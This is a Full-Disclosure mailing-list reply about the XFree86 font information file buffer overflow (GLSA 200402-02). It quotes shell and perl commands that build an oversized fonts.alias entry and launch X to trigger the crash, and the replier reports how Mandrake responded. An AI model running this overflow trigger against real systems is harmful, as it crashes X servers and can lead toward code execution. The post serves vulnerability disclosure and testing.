[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

[Full-Disclosure] Re: [ GLSA 200402-02 ] XFree86 Font Information File Buffer Overflow



> To reproduce the overflow on the command line, you can run:
>
> # cat > fonts.dir <<EOF
> ~  1
> ~  word.bdf \
> ~  -misc-fixed-medium-r-semicondensed--13-120-75-75-c-60-iso8859-1
> ~  EOF
> # perl -e 'print "0" x 1024 . "A" x 96 . "\n"' > fonts.alias
> # X :0 -fp $PWD
>
> {Some output removed}... Server aborting... Segmentation fault (core
dumped)

mandrake gives me a:

Fatal server error:
Caught signal 11.  Server aborting

no segfault or something...

kind regards,
Evert


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html